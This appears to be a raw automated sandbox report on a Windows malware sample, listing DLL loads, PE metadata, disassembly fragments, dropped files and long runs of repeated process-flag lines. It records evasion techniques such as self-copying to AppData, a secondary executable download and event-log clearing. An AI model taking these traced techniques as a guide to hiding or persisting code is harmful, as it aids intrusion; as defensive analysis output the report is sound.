Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: leBwnyHIgx.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: leBwnyHIgx.exeStatic file information: File size 2581432 > 1048576
                      Source: leBwnyHIgx.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x258200
                      Source: leBwnyHIgx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb source: leBwnyHIgx.exe, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: leBwnyHIgx.exe, 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbu source: powershell.exe, 0000000B.00000002.1806539404.0000000006E91000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0 source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb{/; source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03077490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary, 5_2_03077490
                      Source: leBwnyHIgx.exe.0.dr Static PE information: real checksum: 0x280db4 should be: 0x276fb6
                      Source: leBwnyHIgx.exe Static PE information: real checksum: 0x280db4 should be: 0x276fb6
                      Source: leBwnyHIgx.exe Static PE information: section name: .didata
                      Source: leBwnyHIgx.exe.0.dr Static PE information: section name: .didata
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0063B070 push ecx; mov dword ptr [esp], ecx 0_2_0063B075
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_005DE0D8 push ecx; mov dword ptr [esp], ecx 0_2_005DE0DC
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0047A268 push ecx; mov dword ptr [esp], ecx 0_2_0047A26C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00432368 push ecx; mov dword ptr [esp], edx 0_2_0043236B
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00415334 push ss; retf 0_2_004153F8
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0040D570 push ecx; mov dword ptr [esp], eax 0_2_0040D575
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0040E5E0 push 0040E663h; ret 0_2_0040E65B
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0040A5A0 push ecx; mov dword ptr [esp], edx 0_2_0040A5A1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00479670 push ecx; mov dword ptr [esp], ecx 0_2_00479675
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_004216D8 push ecx; mov dword ptr [esp], ecx 0_2_004216DB
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00421714 push ecx; mov dword ptr [esp], ecx 0_2_00421718
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00410734 push ecx; mov dword ptr [esp], edx 0_2_00410735
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_004C5794 push ecx; mov dword ptr [esp], edx 0_2_004C5795
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00410868 push ecx; mov dword ptr [esp], ecx 0_2_0041086D
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_004FACA0 push ecx; mov dword ptr [esp], eax 0_2_004FACA3
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0042CE20 push ecx; mov dword ptr [esp], edx 0_2_0042CE22
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0047BF34 push ecx; mov dword ptr [esp], edx 0_2_0047BF35
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_100172C7 push eax; ret 0_2_100172C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_04A0629D push eax; ret 3_2_04A06351
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0063B070 push ecx; mov dword ptr [esp], ecx 5_2_0063B075
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_005DE0D8 push ecx; mov dword ptr [esp], ecx 5_2_005DE0DC
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0047A268 push ecx; mov dword ptr [esp], ecx 5_2_0047A26C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00432368 push ecx; mov dword ptr [esp], edx 5_2_0043236B
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00415334 push ss; retf 5_2_004153F8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0040D570 push ecx; mov dword ptr [esp], eax 5_2_0040D575
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0040E5E0 push 0040E663h; ret 5_2_0040E65B
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0040A5A0 push ecx; mov dword ptr [esp], edx 5_2_0040A5A1
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00479670 push ecx; mov dword ptr [esp], ecx 5_2_00479675
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_004216D8 push ecx; mov dword ptr [esp], ecx 5_2_004216DB
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00421714 push ecx; mov dword ptr [esp], ecx 5_2_00421718
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00410734 push ecx; mov dword ptr [esp], edx 5_2_00410735
                      Source: initial sample Static PE information: section name: UPX0
                      Source: initial sample Static PE information: section name: UPX1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe File created: C:\Users\user\Downloads\wpsv.5.6.3.exe
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe File created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exe

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0063E56C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow, 0_2_0063E56C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_005B261C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow, 0_2_005B261C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0063E56C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow, 5_2_0063E56C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_005B261C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow, 5_2_005B261C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0307B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog, 5_2_0307B3C0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
